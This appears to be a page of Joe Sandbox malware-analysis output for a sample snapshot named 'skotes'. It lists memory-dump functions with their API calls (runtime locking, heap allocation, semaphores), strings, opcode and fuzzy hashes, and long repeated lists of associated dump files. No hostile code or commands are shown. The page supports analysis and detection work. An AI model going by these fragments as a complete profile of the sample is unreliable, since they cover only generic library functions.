Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockNodeNode::Queue$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 811866635-0
Opcode ID: 288a300020d859b1ef83b611f078531e2712a57bf32c35a77a8106ea6d39aef0
Instruction ID: fdf4501154c7c1c56dcdbec0c2722d580242c7d44f689b66cda82c1813ca1d84
Opcode Fuzzy Hash: 288a300020d859b1ef83b611f078531e2712a57bf32c35a77a8106ea6d39aef0
Instruction Fuzzy Hash: B2E0D834900100ABCB04FB21C4511DCBB61BF44324B00431EE461172E2CF385E8BCB88

Function 0043F1BF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0043F232
__freea.LIBCMT ref: 0043F298

Part of subcall function 0043B04B: RtlAllocateHeap.NTDLL(00000000,F89C42A9,?,?,0041D3FC,F89C42A9,?,00417A8B,?,?,?,?,?,?,00407465,?), ref: 0043B07E

Strings

ZC,mC, xrefs: 0043F1D2

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap__alloca_probe_16__freea
String ID: ZC,mC
API String ID: 809856575-3499607563
Opcode ID: 5bb65a95331292bc8dd123313cb0ffebb1fa612d344abbe466536712dcb7e5ce
Instruction ID: 107384c66d6b808959c7d7396cfaf83ac51d0ba5acea33b47190c89ff2d56654
Opcode Fuzzy Hash: 5bb65a95331292bc8dd123313cb0ffebb1fa612d344abbe466536712dcb7e5ce
Instruction Fuzzy Hash: 4431F071D0020AEBDB209F65CC41EAF7BB8EF88314F04416AF914A7251DB398C55CBA8

Function 00431704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00431764
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004317AF

Strings

pContext, xrefs: 004317A7

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 9018f8aa5e2f1dcdf8aa9758c803532e755f7d857994937d6ffca288971cc1e0
Instruction ID: 942ad2940211714a74bcc9dfb36523be2d48a1416fc9e5f4f6d4d921a905eb8f
Opcode Fuzzy Hash: 9018f8aa5e2f1dcdf8aa9758c803532e755f7d857994937d6ffca288971cc1e0
Instruction Fuzzy Hash: 2F113639A002149BCB05FF58C88596D77A5AF8C365F18406BEC0297362DB3CED05CBD8

Function 00420C5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00420CD7
Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 00420D2A

Strings

p[F, xrefs: 00420CCF

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
String ID: p[F
API String ID: 3303180142-1832964472
Opcode ID: 5781114b3d81dfc41c47be26b8e8a5b78039944ec66511f1246ed51e1e621034
Instruction ID: 460490d00550286d74d196cd5a9549fc7c942c0fed1932104b3464a6bc3d5762
Opcode Fuzzy Hash: 5781114b3d81dfc41c47be26b8e8a5b78039944ec66511f1246ed51e1e621034
Instruction Fuzzy Hash: 510180B0F156249EDB10ABBA755135DA6E06B08318FA0406FE405EB283DA7C5E41876E

Function 0041CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

CreateSemaphoreExW.KERNEL32(?,004265E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0041CAFC
CreateSemaphoreW.KERNEL32(?,004265E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 0041CB1E

Strings

eB, xrefs: 0041CB12, 0041CAF0

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateSemaphore
String ID: eB
API String ID: 1078844751-1684614082
Opcode ID: 0a75b26758247ccc1e2d1fda373b884fd510e78a53fedf65ba4e2f52d09dbcb4
Instruction ID: d803559eaad54cb2c3b4018db65bf1de4fef6802ea1d0146d559ec521011be2d
Opcode Fuzzy Hash: 0a75b26758247ccc1e2d1fda373b884fd510e78a53fedf65ba4e2f52d09dbcb4
Instruction Fuzzy Hash: 27F0B73A545129ABCF125F50EC0589E7F76FB08751B044065FD0996230C676AC61EF95

Function 0042B92C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0042B94E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042B961

Strings

pContext, xrefs: 0042B959

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
